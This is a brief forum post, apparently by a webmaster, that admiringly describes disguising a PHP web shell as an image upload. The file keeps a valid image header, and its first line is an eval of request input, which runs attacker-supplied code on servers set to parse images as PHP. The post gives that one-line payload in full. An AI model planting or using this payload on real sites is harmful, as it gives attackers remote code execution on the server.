My favorite exploit is the fake image upload that has a correct image header...
If the image gets stored "as is" the first line of it is <?eval($_REQUEST['someVar']?>
If the host is configured to parse image files (tracking, dynamic images, etc...) anything they pass in to the request gets evaled... so elegant, so simple, so devastating...
__________________
ICQ: 258-202-811 | Email: eric{at}bestxxxporn.com
|